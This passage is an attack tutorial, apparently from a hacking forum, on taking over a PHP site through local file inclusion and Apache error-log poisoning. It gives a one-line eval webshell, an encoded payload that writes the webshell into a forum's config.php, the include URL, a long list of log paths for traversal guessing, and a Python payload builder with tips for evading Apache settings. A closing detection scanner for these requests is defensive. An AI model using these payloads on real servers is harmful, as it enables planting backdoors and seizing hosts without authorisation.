Because the method above is not very practical (in testing I found the log routinely ran to tens of megabytes, which takes the fun out of it), let's think one step further and write a real, usable webshell, which beats that painfully slow approach by a mile.

For example, still using the same one-line trojan:

<?eval($_POST[cmd]);?>
By this point you may already have thought of it: this is a pretty good approach. Read on, because how to write it becomes the question. We use a statement that fopen()s the file /home/virtual/www.xxx.com/forum/config.php and writes the server-side one-liner <?eval($_POST[cmd]);?> into it. Expressed as a single PHP statement:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,'<?eval($_POST[cmd]);?>');fclose($fp);?> //writes the one-line trojan into config.php

(The inner string is single-quoted on purpose: inside a double-quoted PHP string, $_POST[cmd] is interpolated at the moment the log is included, so config.php would end up holding <?eval();?> instead of the backdoor.)

We submit this statement, let Apache record it in the error log, then include the log, and the shell is written. Remember that it must be converted to URL-encoded form or it will not work: an unencoded ? would start the query string, and the query string is not part of the path Apache writes into its "File does not exist" error entry. Encoded, it becomes:

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E

So we submit

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E
This puts the line that writes the webshell into the error log. Now we include the log again by submitting

http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

and the webshell is written: config.php now contains the one-line trojan.

OK.
http://www.xxx.com/forum/config.php is now our webshell. Connect to it with lanker's client and the host is yours.
PS: everything above depends on the target directory being writable. The sure case is -rwxrwxrwx (777), which you can check against the directories listed earlier; strictly, the directory and the file must be writable by the user Apache runs as, and the log you include must be readable by that same user. Everything above also assumes the log path is known.
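The payload-building side of the procedure above, as an added example that is not code from the original post. It builds the config.php-writing statement, percent-encodes it the way the post does, and shows why the error log rather than the access log is the one worth including: Apache writes the request line into access_log exactly as received (still encoded, so PHP would treat it as text), but puts the decoded path into the "File does not exist" error entry. The client address, document root and both log lines are constructed here, modelled on Apache 2.x's combined log and error formats. One caveat the post does not mention: since Apache 2.0.46, AllowEncodedSlashes (Off by default) rejects a %2F in the path with a 404 that is logged only at info level, below the default LogLevel, so the fully encoded form may never reach error_log; the keep="/" option leaves the slashes unencoded, which avoids that, and in either case include the log and confirm the line landed before relying on it.

```python
"""Log-poisoning payload from the post: encoding, and which log it is executable from."""
import re
from urllib.parse import unquote

# Values taken from the post; the client address and docroot used below are assumptions.
TARGET_FILE = "/home/virtual/www.xxx.com/forum/config.php"
WEBSHELL = "<?eval($_POST[cmd]);?>"


def writer_payload(path=TARGET_FILE, shell=WEBSHELL):
    """PHP that opens `path` for writing and drops `shell` into it.

    The inner one-liner is single-quoted on purpose: in a double-quoted PHP
    string $_POST[cmd] is interpolated at include time, so a double-quoted
    fputs() argument would write "<?eval();?>" into the file, not a backdoor.
    """
    return '<?$fp=fopen("%s","w+");fputs($fp,\'%s\');fclose($fp);?>' % (path, shell)


def percent_encode(s, keep=""):
    """Percent-encode every byte that is not an ASCII letter or digit (uppercase hex,
    the form used in the post). Characters in `keep` pass through; keep="/" yields a
    payload with real slashes, which sidesteps AllowEncodedSlashes."""
    out = []
    for b in s.encode("utf-8"):
        ch = chr(b)
        out.append(ch if ch in keep or (ch.isascii() and ch.isalnum()) else "%%%02X" % b)
    return "".join(out)


def poisoning_request(host, encoded):
    """The raw HTTP request that plants the payload; the 404 it produces is the point."""
    return "GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n" % (encoded, host)


def simulated_logs(client, docroot, encoded):
    """Constructed Apache 2.x-style entries for that request.

    access_log keeps the request line exactly as received (still encoded);
    the error entry carries the percent-decoded path Apache failed to find.
    """
    access = '%s - - [12/Mar/2009:10:02:40 +0800] "GET /%s HTTP/1.0" 404 290' % (client, encoded)
    error = "[Thu Mar 12 10:02:40 2009] [error] [client %s] File does not exist: %s/%s" % (
        client, docroot, unquote(encoded))
    return access, error


PHP_BLOCK = re.compile(r"<\?.*\?>", re.S)  # greedy: the outer block, nested ?> included


def php_in(log_line):
    """The PHP a later include() of this log line would execute, or None if it is inert."""
    m = PHP_BLOCK.search(log_line)
    return m.group(0) if m else None


if __name__ == "__main__":
    encoded = percent_encode(writer_payload())
    print(poisoning_request("www.xxx.com", encoded))
    access, error = simulated_logs("10.0.0.9", "/var/www/html", encoded)
    print("access_log executes:", php_in(access))   # None: still %3C%3F..., plain text to PHP
    print("error_log executes: ", php_in(error))    # the whole writer payload
```

Run it and compare the two printed lines: the same request is inert in one log and a working include target in the other, which is the whole reason the post goes after error_log.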
Other log paths you can guess, or refer to the list here.

../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
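The defender's view of the same technique, as an added example that is not part of the original post: a scanner over Apache combined-format access-log lines that flags both halves of the attack, the poisoning request (a PHP open tag in the percent-decoded request target, which always lands in access_log regardless of which log the attacker later includes) and the inclusion request (a query value that, once ../ prefixes, leading slashes and any %00 tail are stripped, ends in one of the log paths listed above). The sample log lines, the client addresses and the use of the post's z.php?zizzy= page as the vulnerable include are constructed for this example; the path list is the one above, reduced to the suffix that survives traversal.

```python
"""Scan Apache combined-format access-log lines for both halves of the technique."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Log locations from the list above, reduced to the part that survives traversal;
# "apache/logs/..." also covers /usr/local/apache/logs/... and the ../apache/logs/... forms.
LOG_PATH_SUFFIXES = (
    "var/log/httpd/access_log", "var/log/httpd/error_log",
    "apache/logs/access.log", "apache/logs/error.log",
    "apache/logs/access_log", "apache/logs/error_log",
    "etc/httpd/logs/access_log", "etc/httpd/logs/access.log",
    "etc/httpd/logs/error_log", "etc/httpd/logs/error.log",
    "var/www/logs/access_log", "var/www/logs/access.log",
    "var/www/logs/error_log", "var/www/logs/error.log",
    "var/log/apache/access_log", "var/log/apache/access.log",
    "var/log/apache/error_log", "var/log/apache/error.log",
    "var/log/access_log", "var/log/error_log",
)

# Combined Log Format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
# A PHP open tag: "<?php", "<?=", or a short tag followed by code such as "<?$fp" / "<?eval".
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|[\s$A-Za-z_])")


def fully_decode(s, rounds=3):
    """Percent-decode until stable (bounded) so double-encoded payloads are seen too."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def is_poisoning(target):
    """True when the decoded request target carries a PHP open tag."""
    return PHP_TAG_RE.search(fully_decode(target)) is not None


def strip_traversal(path):
    """Drop ../ and ./ segments, leading slashes and a %00 tail; keep the real path suffix."""
    path = fully_decode(path).split("\x00", 1)[0].replace("\\", "/")
    return "/".join(p for p in path.split("/") if p not in ("", ".", ".."))


def included_log(target):
    """(param, value) for the first query value that resolves to a known log file, else None."""
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        candidate = strip_traversal(value)
        if any(candidate == s or candidate.endswith("/" + s) for s in LOG_PATH_SUFFIXES):
            return key, value
    return None


def scan(lines):
    """(ip, kind, detail) for every line that shows one half of the attack."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group("ip"), m.group("target")
        if is_poisoning(target):
            findings.append((ip, "log-poisoning", fully_decode(target)[:60]))
        hit = included_log(target)
        if hit:
            findings.append((ip, "log-inclusion", "%s=%s" % hit))
    return findings


# Constructed sample: normal traffic, one poisoning request, two inclusion attempts
# against the z.php?zizzy= page from the post, and a benign include of a local page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2009:10:02:11 +0800] "GET /index.php HTTP/1.1" 200 4312 "-" "Mozilla/4.0"
10.0.0.9 - - [12/Mar/2009:10:02:40 +0800] "GET /%3C%3F%24fp%3Dfopen%28%22%2Ftmp%2Fx%2Ephp%22%2C%22w%2B%22%29%3B%3F%3E HTTP/1.1" 404 290 "-" "Mozilla/4.0"
10.0.0.9 - - [12/Mar/2009:10:03:02 +0800] "GET /z.php?zizzy=../../../../../../../../../../var/log/httpd/error_log HTTP/1.1" 200 51200 "-" "Mozilla/4.0"
10.0.0.9 - - [12/Mar/2009:10:03:30 +0800] "GET /z.php?zizzy=%2Fusr%2Flocal%2Fapache%2Flogs%2Faccess_log%00 HTTP/1.1" 200 7300 "-" "Mozilla/4.0"
10.0.0.7 - - [12/Mar/2009:10:04:00 +0800] "GET /z.php?zizzy=pages/about.php HTTP/1.1" 200 1200 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for ip, kind, detail in scan(SAMPLE_LOG.splitlines()):
        print("%-10s %-14s %s" % (ip, kind, detail))
```

Matching on the path suffix rather than the literal list entries is deliberate: the number of ../ segments in the request is arbitrary (the list above uses ten), and an absolute path, a traversal path and a %00-terminated path all point at the same file. The PHP-tag check decodes before matching because the poisoning request is, by the post's own advice, always sent encoded.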